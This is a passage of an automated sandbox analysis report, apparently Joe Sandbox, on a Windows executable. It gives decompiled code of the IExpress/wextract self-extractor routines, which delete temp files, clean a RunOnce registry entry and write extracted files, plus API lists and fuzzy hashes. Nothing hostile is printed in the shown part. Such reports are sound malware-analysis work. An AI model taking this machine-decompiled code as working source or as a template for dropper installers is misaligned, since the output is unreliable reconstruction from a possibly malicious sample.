                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F4D,?,00000002,00000000), ref: 01095201
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01095250
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$UPROMPT
                                                          • API String ID: 957408736-2980973527
                                                          • Opcode ID: d22399dab0f40a000b1a20080f711ad7ea6e8c6ce202d598b868a6b9534c02df
                                                          • Instruction ID: f12e2b7ffdfd1b2da10943b958b065ce7a4fa2d2dceb5337238a710e86ead020
                                                          • Opcode Fuzzy Hash: d22399dab0f40a000b1a20080f711ad7ea6e8c6ce202d598b868a6b9534c02df
                                                          • Instruction Fuzzy Hash: CD11E6F1300201ABDF266B765D78B7F61DDFBCA394B00406EB6C2D6184DA7E88016224
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E010952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t9;
                                                          				signed int _t11;
                                                          				void* _t21;
                                                          				void* _t29;
                                                          				CHAR** _t31;
                                                          				void* _t32;
                                                          				signed int _t33;
                                                          
                                                          				_t28 = __edi;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t33;
                                                          				_push(__esi);
                                                          				_t31 =  *0x10991e0; // 0xd18308
                                                          				if(_t31 != 0) {
                                                          					_push(__edi);
                                                          					do {
                                                          						_t29 = _t31;
                                                          						if( *0x1098a24 == 0 &&  *0x1099a30 == 0) {
                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                          							DeleteFileA( *_t31); // executed
                                                          						}
                                                          						_t31 = _t31[1];
                                                          						LocalFree( *_t29);
                                                          						LocalFree(_t29);
                                                          					} while (_t31 != 0);
                                                          					_pop(_t28);
                                                          				}
                                                          				_t11 =  *0x1098a20; // 0x0
                                                          				_pop(_t32);
                                                          				if(_t11 != 0 &&  *0x1098a24 == 0 &&  *0x1099a30 == 0) {
                                                          					_push(_t22);
                                                          					E01091781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          					if(( *0x1099a34 & 0x00000020) != 0) {
                                                          						E010965E8( &_v268);
                                                          					}
                                                          					SetCurrentDirectoryA(".."); // executed
                                                          					_t22 =  &_v268;
                                                          					E01092390( &_v268);
                                                          					_t11 =  *0x1098a20; // 0x0
                                                          				}
                                                          				if( *0x1099a40 != 1 && _t11 != 0) {
                                                          					_t11 = E01091FE1(_t22); // executed
                                                          				}
                                                          				 *0x1098a20 =  *0x1098a20 & 0x00000000;
                                                          				return E01096CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                          			}












                                                          0x010952b6
                                                          0x010952b6
                                                          0x010952b6
                                                          0x010952c1
                                                          0x010952c8
                                                          0x010952cb
                                                          0x010952cc
                                                          0x010952d4
                                                          0x010952d6
                                                          0x010952d7
                                                          0x010952de
                                                          0x010952e0
                                                          0x010952f2
                                                          0x010952fa
                                                          0x010952fa
                                                          0x01095302
                                                          0x01095305
                                                          0x0109530c
                                                          0x01095312
                                                          0x01095316
                                                          0x01095316
                                                          0x01095317
                                                          0x0109531c
                                                          0x0109531f
                                                          0x01095333
                                                          0x01095345
                                                          0x01095351
                                                          0x01095359
                                                          0x01095359
                                                          0x01095363
                                                          0x01095369
                                                          0x0109536f
                                                          0x01095374
                                                          0x01095374
                                                          0x01095381
                                                          0x01095387
                                                          0x01095387
                                                          0x0109538f
                                                          0x010953a0

                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00D18308,00000080,?,00000000), ref: 010952F2
                                                          • DeleteFileA.KERNELBASE(00D18308), ref: 010952FA
                                                          • LocalFree.KERNEL32(00D18308,?,00000000), ref: 01095305
                                                          • LocalFree.KERNEL32(00D18308), ref: 0109530C
                                                          • SetCurrentDirectoryA.KERNELBASE(010911FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 01095363
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01095334
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 2833751637-2356899610
                                                          • Opcode ID: 6f64aa27485c22622653065b12671c8cfcf780fc36eeab12d4caed2b53b9e242
                                                          • Instruction ID: 5504c49e3a683b529fd8782b10988ff566fa0749dda8d3681ec3ab875a2d47a5
                                                          • Opcode Fuzzy Hash: 6f64aa27485c22622653065b12671c8cfcf780fc36eeab12d4caed2b53b9e242
                                                          • Instruction Fuzzy Hash: 87218031600209DBEF729B25D83976977A0FB44714F04819EE9C657298CBBE5984EB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01091FE1(void* __ecx) {
                                                          				void* _v8;
                                                          				long _t4;
                                                          
                                                          				if( *0x1098530 != 0) {
                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                          					if(_t4 == 0) {
                                                          						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                          						return RegCloseKey(_v8);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}





                                                          0x01091fee
                                                          0x01092005
                                                          0x0109200d
                                                          0x01092017
                                                          0x00000000
                                                          0x01092020
                                                          0x0109200d
                                                          0x01092029

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0109538C,?,?,0109538C), ref: 01092005
                                                          • RegDeleteValueA.KERNELBASE(0109538C,wextract_cleanup1,?,?,0109538C), ref: 01092017
                                                          • RegCloseKey.ADVAPI32(0109538C,?,?,0109538C), ref: 01092020
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                          • API String ID: 849931509-1592051331
                                                          • Opcode ID: bdbea3748939c35b42a3e55dbe58f069a3724e8758fa9bb97ccc05f8c9313815
                                                          • Instruction ID: edabf481fa78a8d51bc6fdd7d030419d742362d171054feae4ef2efad7c53d52
                                                          • Opcode Fuzzy Hash: bdbea3748939c35b42a3e55dbe58f069a3724e8758fa9bb97ccc05f8c9313815
                                                          • Instruction Fuzzy Hash: 68E04F30650318FBEF318A91EC2EF6D7B6AF781780F10019ABA84A1155E7665A14E704
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E01094CD0(char* __edx, long _a4, int _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				long _t32;
                                                          				signed int _t33;
                                                          				long _t35;
                                                          				long _t36;
                                                          				struct HWND__* _t37;
                                                          				long _t38;
                                                          				long _t39;
                                                          				long _t41;
                                                          				long _t44;
                                                          				long _t45;
                                                          				long _t46;
                                                          				signed int _t50;
                                                          				long _t51;
                                                          				char* _t58;
                                                          				long _t59;
                                                          				char* _t63;
                                                          				long _t64;
                                                          				CHAR* _t71;
                                                          				CHAR* _t74;
                                                          				int _t75;
                                                          				signed int _t76;
                                                          
                                                          				_t69 = __edx;
                                                          				_t29 =  *0x1098004; // 0x8a9c601
                                                          				_t30 = _t29 ^ _t76;
                                                          				_v8 = _t30;
                                                          				_t75 = _a8;
                                                          				if( *0x10991d8 == 0) {
                                                          					_t32 = _a4;
                                                          					__eflags = _t32;
                                                          					if(_t32 == 0) {
                                                          						_t33 = E01094E99(_t75);
                                                          						L35:
                                                          						return E01096CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                          					}
                                                          					_t35 = _t32 - 1;
                                                          					__eflags = _t35;
                                                          					if(_t35 == 0) {
                                                          						L9:
                                                          						_t33 = 0;
                                                          						goto L35;
                                                          					}
                                                          					_t36 = _t35 - 1;
                                                          					__eflags = _t36;
                                                          					if(_t36 == 0) {
                                                          						_t37 =  *0x1098584; // 0x0
                                                          						__eflags = _t37;
                                                          						if(_t37 != 0) {
                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                          						}
                                                          						_t54 = 0x10991e4;
                                                          						_t58 = 0x10991e4;
                                                          						do {
                                                          							_t38 =  *_t58;
                                                          							_t58 =  &(_t58[1]);
                                                          							__eflags = _t38;
                                                          						} while (_t38 != 0);
                                                          						_t59 = _t58 - 0x10991e5;
                                                          						__eflags = _t59;
                                                          						_t71 =  *(_t75 + 4);
                                                          						_t73 =  &(_t71[1]);
                                                          						do {
                                                          							_t39 =  *_t71;
                                                          							_t71 =  &(_t71[1]);
                                                          							__eflags = _t39;
                                                          						} while (_t39 != 0);
                                                          						_t69 = _t71 - _t73;
                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							L3:
                                                          							_t33 = _t30 | 0xffffffff;
                                                          							goto L35;
                                                          						}
                                                          						_t69 = 0x10991e4;
                                                          						_t30 = E01094702( &_v268, 0x10991e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t41 = E0109476D( &_v268, __eflags);
                                                          						__eflags = _t41;
                                                          						if(_t41 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_push(0x180);
                                                          						_t30 = E01094980( &_v268, 0x8302); // executed
                                                          						_t75 = _t30;
                                                          						__eflags = _t75 - 0xffffffff;
                                                          						if(_t75 == 0xffffffff) {
                                                          							goto L3;
                                                          						}
                                                          						_t30 = E010947E0( &_v268);
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						 *0x10993f4 =  *0x10993f4 + 1;
                                                          						_t33 = _t75;
                                                          						goto L35;
                                                          					}
                                                          					_t44 = _t36 - 1;
                                                          					__eflags = _t44;
                                                          					if(_t44 == 0) {
                                                          						_t54 = 0x10991e4;
                                                          						_t63 = 0x10991e4;
                                                          						do {
                                                          							_t45 =  *_t63;
                                                          							_t63 =  &(_t63[1]);
                                                          							__eflags = _t45;
                                                          						} while (_t45 != 0);
                                                          						_t74 =  *(_t75 + 4);
                                                          						_t64 = _t63 - 0x10991e5;
                                                          						__eflags = _t64;
                                                          						_t69 =  &(_t74[1]);
                                                          						do {
                                                          							_t46 =  *_t74;
                                                          							_t74 =  &(_t74[1]);
                                                          							__eflags = _t46;
                                                          						} while (_t46 != 0);
                                                          						_t73 = _t74 - _t69;
                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 = 0x10991e4;
                                                          						_t30 = E01094702( &_v268, 0x10991e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                          						_t30 = E01094C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						E01094B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                          						__eflags = _t50;
                                                          						if(_t50 != 0) {
                                                          							_t51 = _t50 & 0x00000027;
                                                          							__eflags = _t51;
                                                          						} else {
                                                          							_t51 = 0x80;
                                                          						}
                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t33 = 1;
                                                          							goto L35;
                                                          						}
                                                          					}
                                                          					_t30 = _t44 - 1;
                                                          					__eflags = _t30;
                                                          					if(_t30 == 0) {
                                                          						goto L3;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				if(_a4 == 3) {
                                                          					_t30 = E01094B60( *((intOrPtr*)(_t75 + 0x14)));
                                                          				}
                                                          				goto L3;
                                                          			}































                                                          0x01094cd0
                                                          0x01094cdb
                                                          0x01094ce0
                                                          0x01094ce2
                                                          0x01094cee
                                                          0x01094cf2
                                                          0x01094d0e
                                                          0x01094d0e
                                                          0x01094d11
                                                          0x01094e83
                                                          0x01094e88
                                                          0x01094e98
                                                          0x01094e98
                                                          0x01094d17
                                                          0x01094d17
                                                          0x01094d1a
                                                          0x01094d2f
                                                          0x01094d2f
                                                          0x00000000
                                                          0x01094d2f
                                                          0x01094d1c
                                                          0x01094d1c
                                                          0x01094d1f
                                                          0x01094dcb
                                                          0x01094dd0
                                                          0x01094dd2
                                                          0x01094ddd
                                                          0x01094ddd
                                                          0x01094de3
                                                          0x01094de8
                                                          0x01094ded
                                                          0x01094ded
                                                          0x01094def
                                                          0x01094df0
                                                          0x01094df0
                                                          0x01094df4
                                                          0x01094df4
                                                          0x01094df6
                                                          0x01094df9
                                                          0x01094dfc
                                                          0x01094dfc
                                                          0x01094dfe
                                                          0x01094dff
                                                          0x01094dff
                                                          0x01094e03
                                                          0x01094e08
                                                          0x01094e0a
                                                          0x01094e0f
                                                          0x01094d03
                                                          0x01094d03
                                                          0x00000000
                                                          0x01094d03
                                                          0x01094e18
                                                          0x01094e20
                                                          0x01094e25
                                                          0x01094e27
                                                          0x00000000
                                                          0x00000000
                                                          0x01094e33
                                                          0x01094e38
                                                          0x01094e3a
                                                          0x00000000
                                                          0x00000000
                                                          0x01094e40
                                                          0x01094e51
                                                          0x01094e56
                                                          0x01094e5b
                                                          0x01094e5e
                                                          0x00000000
                                                          0x00000000
                                                          0x01094e6a
                                                          0x01094e6f
                                                          0x01094e71
                                                          0x00000000
                                                          0x00000000
                                                          0x01094e77
                                                          0x01094e7d
                                                          0x00000000
                                                          0x01094e7d
                                                          0x01094d25
                                                          0x01094d25
                                                          0x01094d28
                                                          0x01094d36
                                                          0x01094d3b
                                                          0x01094d40
                                                          0x01094d40
                                                          0x01094d42
                                                          0x01094d43
                                                          0x01094d43
                                                          0x01094d47
                                                          0x01094d4a
                                                          0x01094d4a
                                                          0x01094d4c
                                                          0x01094d4f
                                                          0x01094d4f
                                                          0x01094d51
                                                          0x01094d52
                                                          0x01094d52
                                                          0x01094d56
                                                          0x01094d5b
                                                          0x01094d5d
                                                          0x01094d62
                                                          0x00000000
                                                          0x00000000
                                                          0x01094d67
                                                          0x01094d6f
                                                          0x01094d74
                                                          0x01094d76
                                                          0x00000000
                                                          0x00000000
                                                          0x01094d7c
                                                          0x01094d84
                                                          0x01094d89
                                                          0x01094d8b
                                                          0x00000000
                                                          0x00000000
                                                          0x01094d94
                                                          0x01094d99
                                                          0x01094d9e
                                                          0x01094da1
                                                          0x01094daa
                                                          0x01094daa
                                                          0x01094da3
                                                          0x01094da3
                                                          0x01094da3
                                                          0x01094db5
                                                          0x01094dbb
                                                          0x01094dbd
                                                          0x00000000
                                                          0x01094dc3
                                                          0x01094dc5
                                                          0x00000000
                                                          0x01094dc5
                                                          0x01094dbd
                                                          0x01094d2a
                                                          0x01094d2a
                                                          0x01094d2d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01094d2d
                                                          0x01094cf8
                                                          0x01094cfd
                                                          0x01094d02
                                                          0x00000000

                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 01094DB5
                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01094DDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: AttributesFileItemText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 3625706803-2356899610
                                                          • Opcode ID: 03bc112f74b20e0a0985f547804ac75b3fcae55616ac999aa9089d8a94f0fce5
                                                          • Instruction ID: 3400e51a4cabd4d14df1e0ba29540e94b7887cb044663d63ea097d5c29442cc6
                                                          • Opcode Fuzzy Hash: 03bc112f74b20e0a0985f547804ac75b3fcae55616ac999aa9089d8a94f0fce5
                                                          • Instruction Fuzzy Hash: 5941263A2041068BDF61AE2CDB746F977E5FF45304F0486A8D8C2D7285DA32DA47E750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01094C37(signed int __ecx, int __edx, int _a4) {
                                                          				struct _FILETIME _v12;
                                                          				struct _FILETIME _v20;
                                                          				FILETIME* _t14;
                                                          				int _t15;
                                                          				signed int _t21;
                                                          
                                                          				_t21 = __ecx * 0x18;
                                                          				if( *((intOrPtr*)(_t21 + 0x1098d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t14 =  &_v12;
                                                          					_t15 = SetFileTime( *(_t21 + 0x1098d74), _t14, _t14, _t14); // executed
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					return 1;
                                                          				}
                                                          			}








                                                          0x01094c40
                                                          0x01094c4a
                                                          0x01094c8d
                                                          0x00000000
                                                          0x01094c70
                                                          0x01094c70
                                                          0x01094c7e
                                                          0x01094c86
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01094c8a

                                                          APIs
                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 01094C54
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01094C66
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 01094C7E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Time$File$DateLocal
                                                          • String ID:
                                                          • API String ID: 2071732420-0
                                                          • Opcode ID: aaafb29129fbd7699be28013b2e6aa42d84d920522020656fc6c3bbfd43e298c
                                                          • Instruction ID: 922700d8bee6759be7f71a780c34d4c66598bc0792020367ae543f7deaaa6640
                                                          • Opcode Fuzzy Hash: aaafb29129fbd7699be28013b2e6aa42d84d920522020656fc6c3bbfd43e298c
                                                          • Instruction Fuzzy Hash: A7F024B261020DBFAFA4EFA8CD68CFF7BECEB04240700456BB981C2200EA31D504D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E0109487A(CHAR* __ecx, signed int __edx) {
                                                          				void* _t7;
                                                          				CHAR* _t11;
                                                          				long _t18;
                                                          				long _t23;
                                                          
                                                          				_t11 = __ecx;
                                                          				asm("sbb edi, edi");
                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                          				if((__edx & 0x00000100) == 0) {
                                                          					asm("sbb esi, esi");
                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                          				} else {
                                                          					if((__edx & 0x00000400) == 0) {
                                                          						asm("sbb esi, esi");
                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                          					} else {
                                                          						_t23 = 1;
                                                          					}
                                                          				}
                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                          					return _t7;
                                                          				} else {
                                                          					E0109490C(_t11);
                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                          				}
                                                          			}







                                                          0x01094880
                                                          0x0109488c
                                                          0x01094894
                                                          0x010948a0
                                                          0x010948c9
                                                          0x010948ce
                                                          0x010948a2
                                                          0x010948a8
                                                          0x010948b7
                                                          0x010948bc
                                                          0x010948aa
                                                          0x010948ac
                                                          0x010948ac
                                                          0x010948a8
                                                          0x010948de
                                                          0x010948e7
                                                          0x0109490b
                                                          0x010948ee
                                                          0x010948f0
                                                          0x00000000
                                                          0x01094902

                                                          APIs
                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,01094A23,?,01094F67,*MEMCAB,00008000,00000180), ref: 010948DE
                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,01094F67,*MEMCAB,00008000,00000180), ref: 01094902
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 755b2a1c76af2257ce1d8dd58247d15cedece31680785c136bda4b05825c9b2e
                                                          • Instruction ID: e7ecd0f19c5830c37a36faa31314f709a521649baaf10a99740df91640163a2c
                                                          • Opcode Fuzzy Hash: 755b2a1c76af2257ce1d8dd58247d15cedece31680785c136bda4b05825c9b2e
                                                          • Instruction Fuzzy Hash: D301ADA3E1253026F72440284D98FFB454CDBD6630F1B0331FEEAEB1C1D1644C0192E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E01094AD0(signed int _a4, void* _a8, long _a12) {
                                                          				signed int _t9;
                                                          				int _t12;
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				void* _t20;
                                                          				struct HWND__* _t21;
                                                          				signed int _t24;
                                                          				signed int _t25;
                                                          
                                                          				_t20 =  *0x109858c; // 0x274
                                                          				_t9 = E01093680(_t20);
                                                          				if( *0x10991d8 == 0) {
                                                          					_push(_t24);
                                                          					_t12 = WriteFile( *(0x1098d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                          					if(_t12 != 0) {
                                                          						_t25 = _a12;
                                                          						if(_t25 != 0xffffffff) {
                                                          							_t14 =  *0x1099400; // 0x5e800
                                                          							_t15 = _t14 + _t25;
                                                          							 *0x1099400 = _t15;
                                                          							if( *0x1098184 != 0) {
                                                          								_t21 =  *0x1098584; // 0x0
                                                          								if(_t21 != 0) {
                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10993f8, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t25 = _t24 | 0xffffffff;
                                                          					}
                                                          					return _t25;
                                                          				} else {
                                                          					return _t9 | 0xffffffff;
                                                          				}
                                                          			}











                                                          0x01094ad5
                                                          0x01094adb
                                                          0x01094ae7
                                                          0x01094aee
                                                          0x01094b05
                                                          0x01094b0d
                                                          0x01094b14
                                                          0x01094b1a
                                                          0x01094b1c
                                                          0x01094b21
                                                          0x01094b2a
                                                          0x01094b2f
                                                          0x01094b31
                                                          0x01094b39
                                                          0x01094b54
                                                          0x01094b54
                                                          0x01094b39
                                                          0x01094b2f
                                                          0x01094b0f
                                                          0x01094b0f
                                                          0x01094b0f
                                                          0x01094b5e
                                                          0x01094ae9
                                                          0x01094aed
                                                          0x01094aed

                                                          APIs
                                                            • Part of subcall function 01093680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0109369F
                                                            • Part of subcall function 01093680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936B2
                                                            • Part of subcall function 01093680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936DA
                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01094B05
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 1b466fe10650589e4b16c030bc388220a4a280c2b21d6292533105352816769a
                                                          • Instruction ID: 651bd0f2ac97860068a1a268a44178ee99de5407a2e856916f73179b079f1e97
                                                          • Opcode Fuzzy Hash: 1b466fe10650589e4b16c030bc388220a4a280c2b21d6292533105352816769a
                                                          • Instruction Fuzzy Hash: BB01D2312002049BEB248F28DD35BA67B98F744725F04C36AFAB9D72D4CB368812DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0109658A(char* __ecx, void* __edx, char* _a4) {
                                                          				intOrPtr _t4;
                                                          				char* _t6;
                                                          				char* _t8;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				char* _t16;
                                                          				intOrPtr* _t17;
                                                          				void* _t18;
                                                          				char* _t19;
                                                          
                                                          				_t16 = __ecx;
